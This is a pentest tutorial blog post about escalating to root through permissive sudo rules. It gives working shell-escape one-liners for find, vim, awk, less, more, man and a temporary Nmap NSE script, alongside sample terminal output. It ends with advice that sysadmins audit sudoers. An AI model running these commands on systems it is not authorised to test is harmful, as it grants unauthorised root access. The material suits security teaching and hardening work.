Abusing SUDO for fun and profit!

The SUDO (Substitute User and Do) command allows users to delegate privileges resources: users can execute specific commands under other users (also root) using their own passwords instead of user’s one or without password depending upon setting in /etc/sudoers file.

For more information about sudoers configuration, please refers to official documentation.

So, if during a pentest you has been able to obtain a shell without root privileges, you could try to perform a privilege escalation using SUDO, exploiting some functionality of applications allowed to be executed under SUDO.

In order to exploiting sudo users, first you need to find which commands current user is allowed, using the sudo -l command:

andrea@viserion:~$ sudo -l
Matching Defaults entries for andrea on viserion:
 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User andrea may run the following commands on viserion:
 (root) NOPASSWD: /usr/bin/find
 (root) NOPASSWD: /usr/bin/vim
 (root) NOPASSWD: /usr/bin/awk

In this case, three command are allowed to be executed with root permissions, so we can try to obtain a privileged shell using some features of this commands.

For example, we can exploit the -exec paramether of find command:

andrea@viserion:~$ sudo find /etc/passwd -exec /bin/sh \;
# whoami

or the -c paramether of vim:

andrea@viserion:~$ sudo vim -c '!sh'
# whoami

Also awk allows the invocation of a shell:

andrea@viserion:~$ sudo awk 'BEGIN {system("/bin/sh")}'
# whoami

and less, more and man allows command execution:


-<flag> Toggle a command line option [see OPTIONS below].
 --<name> Toggle a command line option, by name.
 _<flag> Display the setting of a command line option.
 __<name> Display the setting of an option, by name.
 +cmd Execute the less cmd each time a new file is examined.

!command Execute the shell command with $SHELL.
 |Xcommand Pipe file between current pos & mark X to shell command.
 v Edit the current file with $VISUAL or $EDITOR.
 V Print version number of "less".

so, simply call

sudo less /etc/hosts
sudo more /etc/hosts
sudo man ls

the press !sh and hit enter.

Finally, e more laborious approach using a custom Nmap NSE script:

andrea@viserion:~$ echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
Starting Nmap 6.40 ( http://nmap.org ) at 2018-04-24 10:41 DST
# whoami

A lot of other tools allows command execution, and this tools could be included in sudo configuration.

Basically, imagination is the only limit: sysadmins should frequently double check the sudoers configuration, in order to avoid this kind of privilege escalations.

References and further readings

feature image from https://xkcd.com/149/